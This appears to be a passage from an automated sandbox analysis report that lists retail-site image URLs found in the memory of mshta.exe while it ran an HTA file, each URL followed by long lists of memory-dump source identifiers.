Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201_1GG.jpg
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201_1SZ.jpg
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/5008766730/imagens/bicicleta-aro-24-kls-sport-gold-freio-v
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/5271512690/imagens/fritadeira-air-fryer-philco-chrome-5-5-
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/60405799/imagens/ck-be-calvin-klein-eau-de-toilette-perfum
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/7211551574/imagens/sunga-masculina-adidas-3-listras/721155
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396040863.000000000DB61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/7503637854/imagens/conjunto-com-40-bolas-de-4cm-vermelha-e
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/7510984342/imagens/cordao-300-leds-30-metros-8-funcoes-bra
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554675837.000000000A99E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2021/03/05/americanassocial_app.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2021/03/05/americanassocial_app.pngf_
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577286875.000000000A980000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.pngx-cb8bf5b6c936.png.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558057036.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573133207.0000000007150000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542732517.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577367389.000000000A991000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/08/thumbnail_BannerAPP_07-04-3ef281a2ba9f.jpg
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/08/thumbnail_BannerAPP_07-04-3ef281a2ba9f.jpgoZ
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510880698.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/07/15/_informatica-a6061b57bcbc.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/08/01/LG-Agosto-01082022_americanas-home-banner-TT
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502389713.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502532091.0000000002E52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512134953.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556953480.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12569764302.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/12/07/291422413_392978049367464_116978390465635854
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12399441552.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401910650.00000000069F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401959077.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/04/27/Samsung-1P-Abril-Contrato-RJ_americanas-home
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/05/12/espacamento-10-d905af122871.png
